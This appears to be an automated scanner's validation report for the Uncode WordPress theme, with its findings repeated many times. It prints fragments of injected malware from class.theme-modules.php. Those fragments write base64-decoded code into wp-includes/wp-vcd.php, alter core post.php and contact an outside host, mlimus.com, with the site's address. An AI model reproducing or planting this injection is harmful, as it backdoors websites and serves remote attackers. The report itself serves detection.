0
Validation results

Uncode

Uncode

WordPress 4.9.1 theme
0
Critical alerts
  1. Title : Title The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.
  2. Security breaches : Modification of PHP server settings Found ini_set in file class.theme-modules.php.
    Line 5: ini_set('display_errors', 0);
    Found ini_set in file class.theme-modules.php.
    Line 5: ini_set('display_errors', 0);
  3. Security breaches : Use of base64_decode() Found base64_decode in file class.theme-modules.php.
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS['WP_CD_CODE']))) )
    Line 91: $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
    Found base64_decode in file vc_gallery.php.
    Line 183: $items = json_decode( base64_decode( strip_tags( $items ) ), true);
    Found base64_decode in file uncode_index.php.
    Line 335: $items = json_decode( base64_decode( strip_tags( $items ) ), true);
    Line 336: $matrix_items = json_decode( base64_decode( strip_tags( $matrix_items ) ), true);
    Found base64_decode in file class.theme-modules.php.
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS['WP_CD_CODE']))) )
    Line 91: $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
  4. Presence of iframes : iframes are sometimes used to load unwanted adverts and malicious code on another site Found <iframe width="100%" scrolling="no" frameborder="no" src="' . $iframe_url . '&color='.$accent_color.'&auto_play=false&hide_related=false&show_comments=true&show_user=true&show_reposts=false"> in file elements.php.
    Line 141: $content_html = '<iframe width='100%' scrolling='no' frameborder='no' src='' . $iframe_url .
    Found <iframe width="100%" scrolling="no" frameborder="no" src="' . $iframe_url . '&color='.$accent_color.'&auto_play=false&hide_related=false&show_comments=true&show_user=true&show_reposts=false"> in file helpers.php.
    Line 617: $media_oembed = '<iframe width='100%' scrolling='no' frameborder='no' src='' . $iframe_url .
  5. Malware : Operations on file system file_get_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 45: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Line 112: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 139: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 217: @file_put_contents(__FILE__, $file);
    file_put_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 45: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Line 112: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 139: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 217: @file_put_contents(__FILE__, $file);
    file_put_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 45: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Line 112: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 139: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 217: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 45: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Line 112: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 139: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 217: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 45: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Line 112: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 139: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 217: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 45: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Line 112: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 139: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 217: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 45: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Line 112: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 139: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 217: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 45: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Line 112: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 139: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 217: @file_put_contents(__FILE__, $file);
    fopen was found in the file parsers.php
    Line 419: $fp = $this->fopen( $file, 'r' );
    Line 637: function fopen( $filename, $mode = 'r' ) {
    Line 640: return fopen( $filename, $mode );
    fclose was found in the file parsers.php
    Line 468: $this->fclose($fp);
    Line 655: function fclose( $fp ) {
    Line 658: return fclose( $fp );
    fopen was found in the file parsers.php
    Line 419: $fp = $this->fopen( $file, 'r' );
    Line 637: function fopen( $filename, $mode = 'r' ) {
    Line 640: return fopen( $filename, $mode );
    fopen was found in the file parsers.php
    Line 419: $fp = $this->fopen( $file, 'r' );
    Line 637: function fopen( $filename, $mode = 'r' ) {
    Line 640: return fopen( $filename, $mode );
    fclose was found in the file parsers.php
    Line 468: $this->fclose($fp);
    Line 655: function fclose( $fp ) {
    Line 658: return fclose( $fp );
    fclose was found in the file parsers.php
    Line 468: $this->fclose($fp);
    Line 655: function fclose( $fp ) {
    Line 658: return fclose( $fp );
    file_get_contents was found in the file ajax.php
    Line 4: $postdata = (Array)json_decode(file_get_contents('php://input'));
    file_get_contents was found in the file UncodeHotfix.class.php
    Line 262: $new_file_contents = file_get_contents($patch['get']);
    file_put_contents was found in the file UncodeHotfix.class.php
    Line 266: $ok = file_put_contents(
    fopen was found in the file create-child-theme.php
    Line 48: $functions_file = fopen($child_theme_dir_path . '/functions.php', 'w') or wp_die('Couldn't cr
    Line 52: $script_file = fopen($child_theme_dir_path . '/style.css', 'w') or wp_die('Couldn't create
    fwrite was found in the file create-child-theme.php
    Line 50: fwrite($functions_file, $functions_file_content);
    Line 54: fwrite($script_file, $script_file_content);
    fopen was found in the file create-child-theme.php
    Line 48: $functions_file = fopen($child_theme_dir_path . '/functions.php', 'w') or wp_die('Couldn't cr
    Line 52: $script_file = fopen($child_theme_dir_path . '/style.css', 'w') or wp_die('Couldn't create
    fwrite was found in the file create-child-theme.php
    Line 50: fwrite($functions_file, $functions_file_content);
    Line 54: fwrite($script_file, $script_file_content);
    file_get_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 45: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Line 112: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 139: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 217: @file_put_contents(__FILE__, $file);
    file_put_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 45: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Line 112: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 139: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 217: @file_put_contents(__FILE__, $file);
    file_put_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 45: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Line 112: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 139: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 217: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 45: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Line 112: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 139: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 217: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Line 45: file_put_contents($path . '/wp-includes/post.php', $file);
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Line 112: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 139: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Line 217: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Line 46: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 107: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 134: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Line 167: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 168: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 173: $content = @file_get_contents('http://www.mlimus.com/o.php?host=' . $_SERVER['HTTP_HOST
    Line 174: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.mlimus.com/admin.txt'));
    Line 198: if ($file = file_get_contents($e[1]))
    Line 213: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Line 41: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
